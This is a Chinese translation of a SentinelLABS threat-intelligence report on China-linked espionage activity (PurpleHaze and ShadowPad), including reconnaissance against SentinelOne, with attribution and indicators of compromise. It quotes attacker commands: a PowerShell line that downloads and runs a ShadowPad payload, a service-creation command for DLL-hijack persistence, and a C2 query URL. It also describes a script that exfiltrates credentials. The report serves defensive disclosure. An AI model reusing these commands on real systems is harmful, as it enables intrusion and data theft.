2024年10月,SentinelLABS观察并阻止了一次针对SentinelOne的侦察行动,该行动被我们归类为一个名为PurpleHaze的更广泛活动集。
在2025年初,我们还识别并协助破坏一次与更广泛的ShadowPad操作相关的入侵事件。受影响的组织在当时负责管理SentinelOne员工的硬件物流。
对SentinelOne基础设施、软件和硬件资产的彻底调查确认,攻击者未能成功,SentinelOne并未受到这些活动的影响。
PurpleHaze和ShadowPad活动集涉及自2024年7月至2025年3月间,针对不同目标进行的多起部分相关的入侵。这些目标包括南亚一政府单位、欧洲一家媒体组织以及70多家跨多个领域的组织。
我们高度自信地将PurpleHaze和ShadowPad活动集归因于中国相关的威胁行为者。我们将部分PurpleHaze入侵与被公开报道的中国网络间谍组织APT15和UNC5174有关的行为者之间进行松散关联。
这项研究强调了中国网络间谍行为者对全球产业和公共部门组织所构成的持续威胁,同时也突显出他们追求的一种鲜为人知的目标:网络安全供应商。
本研究概述了SentinelLABS在2024年后半段及2025年第一季度观察到并对此加以防御的威胁。这篇文章扩展了我们之前的研究,提供了对网络安全供应商(包括SentinelOne)面临的威胁的概述,这些威胁从以金融为动机的网络犯罪到国家行为者的针对性攻击均有涉及。本研究特别关注针对SentinelOne及我们归因于中国相关威胁行为者的其他组织的威胁子集。
通过披露我们所面临的威胁活动的细节,我们聚焦于公众网络威胁情报对话中受到有限关注的威胁格局的一个方面:对网络安全供应商的针对性攻击。我们的目标是通过促进透明度和鼓励协作,帮助增强行业的防御能力。网络安全公司是威胁行为者的高价值目标,因为它们在保护角色、深入了解客户网络环境以及扰乱敌方运营方面具有深厚的优势。这些研究结果突显了中国相关行为者对这些组织的持续兴趣。
本研究聚焦于以下针对SentinelOne的活动以及在我们调查中识别出的怀疑相关操作:
– 2025年初针对一家IT服务和物流组织的入侵,该组织当时负责管理SentinelOne员工的硬件物流。
– 对SentinelOne服务器的广泛远程侦察,这些服务器由于其功能而故意可以从互联网访问。
我们迅速告知了IT服务和物流组织有关入侵的细节。对SentinelOne的基础设施、软件和硬件资产的彻底调查没有发现任何妥协的证据。
目前尚不清楚攻击者的关注点是否仅限于被针对的IT物流组织,还是也意图扩展其影响范围到下游组织。然而,这一案例强调了中国相关威胁行为者构成的持续威胁,他们有寻求建立战略立足点的历史,从而可能妥协下游实体。
至于侦察活动,我们在活动开始时即时识别并绘制了与该操作相关的威胁行为者的基础设施映射。对被攻击的SentinelOne服务器的全面调查没有发现妥协迹象。我们高度自信地评估威胁行为者的活动仅限于对特定互联网面向服务器的映射和评估可用性,这可能是为未来可能采取的行动做准备。对我们服务器的网络流量进行持续监控,这一做法是保护外网暴露的SentinelOne资产的既定和持续实践,使得对侦察活动的快速检测和审查得以实施,有效降低了任何潜在风险。
进一步调查揭示了多个部分相关的入侵和活动集,这些特征符合现代中国相关操作的特征:
– 活动A:2024年6月对南亚政府实体的入侵
– 活动B:2024年7月至2025年3月间影响全球企业的一系列入侵
– 活动C:2025年初针对一家IT服务和物流公司的入侵
– 活动D:2024年10月对同一政府实体的入侵。
– 活动E:2024年10月针对SentinelOne的侦察活动
– 活动F:2024年9月对一家领先的欧洲媒体组织的入侵
接下来的两个部分提供了这些活动的概述,包括时间线、重叠点以及我们的归因评估,随后是具体的技术细节,如观察到的TTP、恶意软件和基础设施,以使相关行业的其他组织能够调查和缓解类似的活动集。
ShadowPad入侵概述
在2024年6月,SentinelLABS观察到了涉及ShadowPad恶意软件的威胁行为者活动,目标是提供IT解决方案和基础设施的南亚政府实体(活动A)。
我们恢复的ShadowPad样本经过了使用ScatterBrain变种的混淆,这是ScatterBee混淆机制的演变。
根据ShadowPad的实施特征,我们识别了其他样本,这些样本揭示了自2024年7月至2025年3月间进行的更广泛的活动(活动B)。通过C2流量和SentinelOne遥测数据,SentinelLABS揭示了跨多个领域影响超过70个受害者的情况,包括制造、政府、金融、电信和研究等行业。我们积极联系了可能受到影响的SentinelOne客户。
其中一个受影响实体是一家IT服务和物流公司,它在那段时间负责管理SentinelOne员工的硬件物流(活动C)。
我们高度自信地将这些入侵归因于中国相关行为者,并正在进行持续努力以确定涉及的具体威胁集。ShadowPad是一个闭源的模块化后门平台,被多个被怀疑与中国相关的威胁行为者用来进行网络间谍活动。谷歌威胁情报小组自2022年以来观察到使用ScatterBrain混淆的ShadowPad样本,并将其归因于与被怀疑的中国APT伞形行为者APT41相关的行为集。
我们识别出的某些ShadowPad样本和基础设施在范围较广的公共报道中已有记录,包括TrendMicro、Orange Cyberdefense和Check Point发布的最新ShadowPad活动的研究。这些活动的某些情况与被称为NailaoLocker的勒索软件部署相关,尽管其动机尚不明了,可能是为了经济利益,或者作为一种干扰、错误归因或去除证据的手段。
PurpleHaze活动集概述
在2024年10月初,SentinelLABS观察到新一波的威胁行为者活动(活动D),再次针对同一南亚政府实体,该实体在2024年6月通过ShadowPad受到攻击(活动A)。
此次入侵涉及被我们分类为GOREshell的后门,我们将其视为一组包含open-source reverse_ssh后门及其自定义变体的恶意软件集群。虽然这些变体在实现上存在差异,但它们在代码上都与reverse_ssh的客户端组件具有相似性。
我们将用于此次入侵的一些基础设施归类为多个被怀疑是中国网络间谍行为者使用的作业中继箱(ORB)网络,尤其是与公开报告的APT15重叠的威胁组织。ORB网络的使用在中国威胁组织中正逐渐成为一种趋势,因为它们可以迅速扩展,以创建一个动态而不断发展的基础设施,使得追踪网络间谍活动及其归因变得复杂。APT15,历史上也被称为Ke3Chang和Nylon Typhoon,是一个被怀疑来自中国的网络间谍组织,已知其全球目标涉及关键行业,包括电信、信息技术和政府机构。
此外,在2024年10月,与南亚政府实体的活动相同的月份,SentinelLABS也观察到针对SentinelOne服务器的远程侦察活动(活动E)。
根据基础设施管理、域名创建和命名实践中存在的重要重叠,我们高度认为,在侦察行动中观察到的基础设施与针对南亚政府实体的威胁行为者(活动D)使用的基础设施相关。
这表明同一威胁行为者的参与,或者是负责为多个威胁组管理基础设施的第三方实体在中国网络间谍环境中常见的情况。
在2024年9月底,即10月活动的几周之前,SentinelLABS观察到一家领先的欧洲媒体组织的入侵(活动F)。
我们的调查揭示了此次入侵中使用的工具与针对南亚政府实体的10月活动(活动D)之间的重叠。这包括GOREshell后门及公共可用工具开发者THC(The Hacker’s Choice)开发的工具。
活动D和活动F是我们首次观察到THC工具被用于APT活动的实例。
我们以高度自信将活动F归因于中国相关的行为者,并对其与被Mandiant追踪的中国初始访问中介UNC5174进行了松散关联。我们承认后期活动可能是由不同的威胁组进行的可能性。
该威胁行为者利用ORB网络基础设施,我们评估该基础设施源于中国,并利用CVE-2024-8963漏洞以及CVE-2024-8190漏洞来建立初始立足点,早在这些漏洞公开披露前几天。这种入侵方法暗示了UNC5174的参与,该组织被评估为中国国家安全部(MSS)的承包商,主要专注于获取访问权限并专门针对目标系统中的漏洞进行利用。之后,UNC5174被怀疑将访问权限转移给其他威胁行为者。
在2025年1月,CISA和FBI发布联合公告,报告了也发生在2024年9月的威胁行为者活动,但未提供具体的归因评估。
2025年3月,法国网络安全局(ANSSI)发布了其2024年网络威胁概述报告,记录了发生在2024年9月的入侵,涉及相同漏洞,并显示出与UNC5174相关的TTP的重叠。
此外,Mandiant已观察到UNC5174利用CVE-2023-46747和CVE-2024-1709漏洞,并部署了一种被公共可用的恶意后门,轨迹为GOREVERSE。
Mandiant所提供的公共GOREVERSE YARA规则中的字符串和代码段与reverse_ssh后门相匹配,将GOREVERSE置于GOREshell恶意软件集群中,这些样本我们在此次入侵和针对南亚政府实体的10月活动中观察到。
我们将活动D、E和F统称为PurpleHaze威胁集群。尽管我们高度自信将PurpleHaze归因于中国相关的威胁行为者,调查仍在继续,以确定活动背后的具体威胁组及其与2024年6月及以后ShadowPad入侵(活动A、B和C)的潜在联系。
我们不排除不同威胁组的参与或同一威胁行为者单独执行的多个入侵的可能性,尤其考虑到公开可用工具的广泛使用和中国威胁组之间广泛共享恶意软件、基础设施和操作惯例的可能性。我们还考虑到,访问权限可能在不同行为者之间转移的可能性,特别是在UNC5174疑似参与的情况下。
ShadowPad入侵的技术细节
我们在下面介绍ShadowPad对南亚政府实体的入侵(活动A)和从2024年7月到2025年3月进行的更广泛ShadowPad活动(活动B和C)的技术细节。
活动A | ShadowPad和ScatterBrain混淆
此次入侵涉及名为AppSov.exe的ShadowPad样本的部署。威胁行为者通过执行一个PowerShell命令来部署AppSov.exe,该命令执行以下操作:
– 使用curl.exe从远程端点下载名为x.dat的文件,延迟为60秒。
– 将下载的文件保存为C:\ProgramData\目录中的AppSov.exe。
– 使用Start-Process PowerShell命令启动该可执行文件。
– 延迟30分钟后重启系统。
代码示例:
sleep 60;curl.exe -o c:\programdata\AppSov.EXE http://[REDACTED]/dompdf/x.dat;start-process c:\programdata\AppSov.EXE;sleep 1800;shutdown.exe -r -t 1 -f;
托管x.dat的端点是同一组织内的一个先前被妥协的系统。我们的分析揭示,该系统上在ShadowPad部署之前大约一个月就已经部署了恶意软件工件。这些恶意软件包括Nimbo-C2开源远程访问框架的代理组件,以及一个PowerShell脚本,其执行以下操作:
– 通过递归搜索C:\Users\目录中的文件,收集敏感用户数据(文档、凭证和加密材料),并筛选最近600天内修改过的文件扩展名,包括:*.xls、*.xlsx、*.ods、*.txt、*.pem、*.cert和*.pfx。
– 将收集到的文件复制到临时文件夹C:\windows\vss\temp。
– 将收集到的文件归档成一个命名为系统MAC地址和日期的压缩文件,便于跟踪被妥协的端点。
– 使用7-Zip加密并保护归档文件,使用密码@WsxCFt6&UJMmko0,以确保数据在检查时被混淆。
– 通过curl POST请求向硬编码的URL发送加密归档以进行外流:https[://]45.13.199[.]209/rss/rss.php。
– 在外流后删除临时文件夹、归档和DAT文件,以避免检测和法证恢复。
Nimbo-C2代理被部署到C:\ProgramData\Prefetch\PfSvc.exe,可能伪装成Privacyware Privatefirewall可执行文件。
我们之前未观察到Nimbo-C2或PowerShell外流脚本的变体在被怀疑的中国APT活动中的使用。此前的研究已经记录Nimbo-C2在APT-K-47(也称为神秘大象)归因的操作中被利用,后者被认为起源于南亚。
ShadowPad样本AppSov.exe的部署引发了几种可能性:
– 相同威胁行为者可能进行了早期活动并进行了ShadowPad的部署;
– 访问已被转交给或被第二个行为者利用;
– 或两位不同的行为者在同一环境内独立操作。
AppSov.exe使用ScatterBrain的变种进行了混淆。恶意软件使用域名news.imaginerjp[.]com和C2通信的IP地址65.38.120[.]110,通过DNS over HTTPS (DoH)来规避检测,试图通过Base-64编码查询的域名和掩盖DNS流量来躲避监控系统。
代码示例:
https[://]8.8.8.8//dns-query?dns=AAABAAABAAAAAAAABG5ld3MKaW1hZ2luZXJqcANjb20AAAEAAQ
AppSov.exe使用分发例程来改变控制流,每次调用这些例程后置放位移,以及不透明谓词进行混淆。该恶意软件使用常量值0x89D17427、0x254733D6、0x6FE2CF4E和0x110302D6来验证其完整性。它与三个模块一同分发:一个ID为0x0A,两个ID为0x20。ShadowPad模块ID指定不同类型的模块,包括配置数据或实现恶意软件功能的代码,如注入或数据盗窃。
有关ScatterBrain混淆机制的详细概述及ShadowPad实施的更多细节,请参见谷歌威胁情报小组的先前研究。
活动B和C | 一项全球ShadowPad操作
根据与AppSov.exe重叠的各种实施特征,包括配置数据以及自定义解密和完整性验证常量值,我们识别出多个其他使用ScatterBee变体混淆的ShadowPad样本。
这也导致我们发现了一些相关的基础设施,包括ShadowPad C2服务器dscriy.chtq[.]net和updata.dsqurey[.]com,以及与ShadowPad相关的域名network.oossafe[.]com和notes.oossafe[.]com。
其中一些样本的执行方式与AppSov.exe不同。它们并未将完整的ShadowPad功能和配置嵌入一个可执行文件中,而是作为Windows DLL实现,旨在被特定的合法可执行文件通过DLL劫持加载。该DLL随后加载一个外部文件,文件名为8个字符长且后缀为.tmp,例如1D017DF2.tmp。
通过C2流量和SentinelOne遥测数据,我们识别了多家受ShadowPad样本影响的受害者组织。从2024年7月至2025年3月,该恶意软件参与了对超过70个跨多个区域的组织的入侵,涉及制造、政府、金融、电信和研究等行业。在此期间,受害者之一正是负责管理SentinelOne员工的IT服务和物流公司(活动C)。
我们怀疑最常见的初始访问向量涉及利用Check Point网关设备,这与之前对该主题的研究一致。我们还观察到来自Fortinet Fortigate、Microsoft IIS、SonicWall和CrushFTP服务器的通信,表明可能利用了这些系统。
PurpleHaze技术细节
我们在以下部分介绍PurpleHaze威胁集群中几个入侵的技术细节:2024年10月对南亚政府实体的入侵(活动D,之前在2024年6月被ShadowPad攻击过),2024年10月对SentinelOne基础设施的侦察(活动E),以及2024年9月对欧洲媒体组织的入侵(活动F)。
活动D | GOREshell与中国基础的ORB网络
2024年10月初,我们在南亚政府实体的一台工作站内检测到系统侦察和恶意代码部署活动。
该威胁行为者执行了ipconfig Windows命令来查询网络配置,并建立与IP地址103.248.61[.]36的连接,端口为443。接着,威胁者在C:\Program Files\VMware\VGAuth目录中下载了名为VGAuth1.zip的压缩包;解压缩其内容后将该压缩包删除。
该压缩包包含两个可执行文件:合法的VGAuthService.exe和一个被称为glib-2.0.dll的恶意DLL文件(原始文件名为libglib-2.0-0.dll),该文件伪装成合法的GLib–2.0库文件。
VGAuthService.exe实施VMware客户认证服务。该威胁行为者部署的是签名为VMWare的11.3.5.59284版本,该版本编译于2021年8月31日,06:14:07 UTC。该版本存在DLL劫持漏洞。
威胁行为者随后创建了一个新的Windows服务,命名为VGAuthService,该服务在系统启动时自动启动,运行VGAuthService.exe可执行文件,并显示为别名管理器和票据服务。
当该服务启动时,VGAuthService.exe会加载并执行恶意的glib-2.0.dll库文件。代码示例:
sc create VGAuthService binPath= “C:\Program Files\VMware\
VGAuth\VGAuthService.exe” start=auto error=ignore displayname=”Alias Manager and Ticket Service”
glib-2.0.dll实施了GOREshell后门,利用reverse_ssh功能建立与攻击者控制的端点的SSH连接。该后门使用Go编程语言实现,并通过Garble进行混淆,包括字符串文本、包路径和函数名。它使用cgo库来调用C代码。
glib-2.0.dll包含一个私有SSH密钥,用于与威胁者的C2服务器建立SSH连接。
活动E | SentinelOne基础设施的探测与侦察
在2024年10月,SentinelLABS观察到对多个面向互联网的SentinelOne服务器的持续远程连接尝试,目标显然是进行侦察。
我们对与此活动相关的基础设施的分析揭示了与2024年10月南亚政府实体的入侵活动(活动D)的关联。
我们识别出的服务器特征和域名注册模式表明,可能存在协调的基础设施管理和批量域名注册,可能是同一威胁行为者在对SentinelOne进行侦察时进行的,或由负责管理这两项活动的第三方实体进行。
我们最初观察到的连接源自一台使用C2服务器作为代理的虚拟专用服务器(VPS)。在该活动进行时,该服务器的IP地址为128.199.124[.]136,对应域名为tatacom.duckdns[.]org,旨在伪装成一家大型南亚电信供应商的基础设施。
根据独特的服务器指纹,SentinelLABS发现了一组与之相关的广泛网络基础设施。
C2域名downloads.trendav[.]vip在活动D中观察到,解析为142.93.214[.]219。这一IP地址也是基于服务器指纹识别的。
此外,与相同指纹相关联的另一台服务器的IP地址为143.244.137[.]54,该IP地址在2024年10月被映射到域名cloud.trendav[.]co。
这一域名与downloads.trendav[.]vip存在重叠。
此外,历史域名注册记录表明,根域名trendav[.]vip于2023年10月24日注册完毕,于UTC时间13:05:29完成注册。识别8个字符域名在同一时刻(到秒为单位)完成注册的所有域名,我们发现了secmailbox[.]us和sentinelxdr[.]us。这后者可能伪装为SentinelOne基础设施。
在2025年2月至4月之间,sentinelxdr[.]us域名解析至142.93.214[.]219,同样是downloads.trendav[.]vip在2024年10月解析的IP地址。
在2024年10月,mail.secmailbox[.]us解析为142.93.212[.]42。与IP地址142.93.214[.]219(downloads.trendav[.]vip/sentinelxdr[.]us)相似,该服务器共享相同的服务器指纹。
此外,sentinelxdr[.]us域名的注册数据在2024年9月25日更新时间为01:43:46 UTC,恰好与trendav[.]vip注册数据的更新时间相同。
活动F | dsniff的回归
在2024年9月底对欧洲媒体组织的入侵显示了与2024年10月对南亚政府实体入侵(活动D)之间的工具重叠。
该威胁行为者对使用UPX打包的GOREshell样本进行了部署,该样本配置使用107.173.111[.]26作为C2通信地址(wss[://]107.173.111[.]26:443)。我们获取的可执行文件包含一个私有SSH密钥和公钥指纹f0746e78e49896dfa01c674bf2a800443b1966c54663db5c679bc86533352590。
基于指纹,我们识别出一个Garble混淆的GOREshell样本,该样本于2024年7月底从伊朗的一个恶意软件分享平台上传。该样本也包含私有SSH密钥,并配置使用相同的C2服务器107.173.111[.]26,通过TLS协议(tls[://]107.173.111[.]26:80)进行通信。
这表明自2024年7月以来,威胁行为者的活动可能针对欧洲和中东的组织。
该威胁行为者还部署了dsniff的版本2.5a1,这是一个用于网络审计和渗透测试的工具集合。在dsniff的主动开发在15年多以前即中断后,我们调查的公共源代码库揭示,THC社区在努力恢复该项目的活跃维护时发布了版本2.5a1。
为了隐藏其活动,威胁行为者对部署的可执行文件进行了时间戳修正,将其创建日期设定为2021年9月15日。在获得初始环境访问权限后,攻击者部署了一个简单的PHP网页外壳,允许通过参数传递命令并使用sudo以提升特权执行。
我们对系统和网络流量线索的分析强烈表明,威胁行为者通过利用CVE-2024-8963和CVE-2024-8190(两个Ivanti Cloud Services Appliance漏洞)获得了初始立足点,时间是在2024年9月5日,早于这些漏洞的公开披露。
我们将此次攻击中使用的某些恶意基础设施追踪为一种ORB网络,怀疑该网络来自中国,且包含被攻陷的网络边缘设备。
结论
这篇文章突出强调了中国相关的网络间谍行为者对多种行业和公共部门组织带来的持续威胁,包括网络安全供应商本身。这里详细的活动反映了这些行为者对负责保护数字基础设施的组织的强烈兴趣。
我们的发现强调了持续警惕、强大监测以及快速响应能力的关键需求。通过向公众分享我们的调查细节,我们的目标是对网络安全供应商受到的鲜为人知的针对性攻击提供洞察,帮助去除与这些活动相关的IOC(妨害证据)的耻辱,从而对中国网络威胁行为者的战术、目标和操作模式提供更深刻的理解。
随着这些对手继续适应我们的响应努力,捍卫者必须优先关注透明度、情报共享和协调行动,而不是出于对声誉受损的恐惧而保持沉默。
我们鼓励行业中的其他人采取积极主动的威胁情报共享和防御协调的方法,认识到集体安全将加强整个社区。
我们感谢Lumen Technologies Black Lotus Labs提供的合作和支持。
图片源于:https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/
